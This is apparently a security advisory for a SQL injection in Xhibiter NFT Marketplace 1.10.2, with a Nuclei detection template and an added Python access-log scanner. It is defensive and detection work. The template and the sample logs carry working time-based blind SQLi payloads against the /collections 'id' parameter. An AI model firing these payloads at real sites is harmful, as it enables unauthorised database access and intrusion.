xhibiter-nft-sqli: Xhibiter NFT Marketplace 1.10.2 - SQL Injection

Date: 2025-08-01 | Affected software: Xhibiter NFT Marketplace | PoC: public

Vulnerability description

Xhibiter NFT Marketplace version 1.10.2 is vulnerable to SQL injection: user-supplied values reach a backend SQL query unsanitized, so an attacker can alter the query's logic through the affected input fields. The detection template below fingerprints the theme and then confirms the flaw with a time-based blind check (a MySQL SLEEP payload in the `id` parameter of `/collections`), treating a 200 response that takes at least seven seconds as a positive.

PoC code [public]

id: xhibiter-nft-sqli

info:
  name: Xhibiter NFT Marketplace 1.10.2 - SQL Injection
  author: ProjectDiscoveryAI
  severity: high
  description: |
    The Xhibiter NFT Marketplace version 1.10.2 is vulnerable to a SQL Injection vulnerability. This allows an attacker to manipulate SQL queries by injecting malicious SQL code through vulnerable input fields.
  reference:
    - https://www.exploit-db.com/exploits/52060
    - https://blog.securelayer7.net/sql-injection-vulnerability-in-xhibiter-nft-marketplace/
    - https://x.com/ExploitDB/status/1807782485549560196
  metadata:
    publicwww-query: "/wp-content/themes/xhibiter/"
    max-request: 2
  tags: xhibiter,sqli,time-based-sqli,wordpress,wp-theme,xhibiter,nft,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '/wp-content/themes/xhibiter/'
        internal: true

  - raw:
      - |
        GET /collections?id=2'+AND+(SELECT+1492+FROM+(SELECT(SLEEP(7)))HsLV)+AND+'KEOa'='KEOa HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration>=7'
        condition: and
# digest: 490a004630440220596cf11a1892f3b12ba32afd9168e80baeaf216bb5545d235fca6ee91f112da202202af8498dfa84005b1174b9ec54812bacec26aae20bde56ec982b92cc05d3f8b0:922c64590222798bb761d5b6d8e72950
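As an added defensive example (not part of the advisory or of the Nuclei template above), the following Python scans web-server access-log lines for the time-based blind SQLi probe the template sends, decoding the request target and pairing it with the server's own recorded response time. The log layout (combined format with the request duration in seconds appended as a final field), the sample lines, and every name in the code are constructed assumptions.

```python
"""Flag time-based blind SQL injection probes in access logs.

Added example, not the advisory's or the template's own code. Assumes a
combined-format log with the request time (seconds) as the last field; the
sample lines below are constructed, and all identifiers are hypothetical.
"""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log: a theme fingerprint fetch, a benign request, the PoC
# payload from the template, and a URL-encoded variant of the same technique.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 0.012
203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "GET /collections?id=2 HTTP/1.1" 200 8192 0.034
203.0.113.5 - - [01/Aug/2025:10:00:10 +0000] "GET /collections?id=2'+AND+(SELECT+1492+FROM+(SELECT(SLEEP(7)))HsLV)+AND+'KEOa'='KEOa HTTP/1.1" 200 8192 7.021
198.51.100.7 - - [01/Aug/2025:10:00:11 +0000] "GET /collections?id=2%27%20AND%20SLEEP(5)%23 HTTP/1.1" 200 8192 5.004
"""

# client ident user [timestamp] "METHOD target PROTO" status bytes seconds
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \d+ (?P<secs>[\d.]+)$'
)

# Delay primitives that time-based blind SQLi depends on (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(r'\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b', re.IGNORECASE)

SLOW_SECONDS = 5.0  # a delay payload plus a response this slow is treated as confirmed


@dataclass
class Finding:
    ip: str
    target: str      # decoded request target
    seconds: float   # server-side request time from the log
    verdict: str     # "confirmed" (payload and slow response) or "attempted"


def decode_target(target: str) -> str:
    """Undo '+' and %XX encoding so SLEEP%287%29 is seen the same as SLEEP(7)."""
    return urllib.parse.unquote_plus(target)


def classify(target: str, seconds: float) -> Optional[str]:
    """Return a verdict for one request, or None when no delay payload is present."""
    if not DELAY_RE.search(decode_target(target)):
        return None
    return "confirmed" if seconds >= SLOW_SECONDS else "attempted"


def analyze(log_text: str) -> List[Finding]:
    """Parse every line and collect the requests that carry a delay payload."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        secs = float(m["secs"])
        verdict = classify(m["target"], secs)
        if verdict:
            findings.append(Finding(m["ip"], decode_target(m["target"]), secs, verdict))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.verdict:9} {f.ip:15} {f.seconds:6.3f}s  {f.target}")
```

The response-time field matters: a delay keyword alone shows only that a probe was sent, while a matching slow response from the server is the same evidence the template's `duration>=7` matcher relies on, so the "confirmed" verdict is the one worth paging on.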
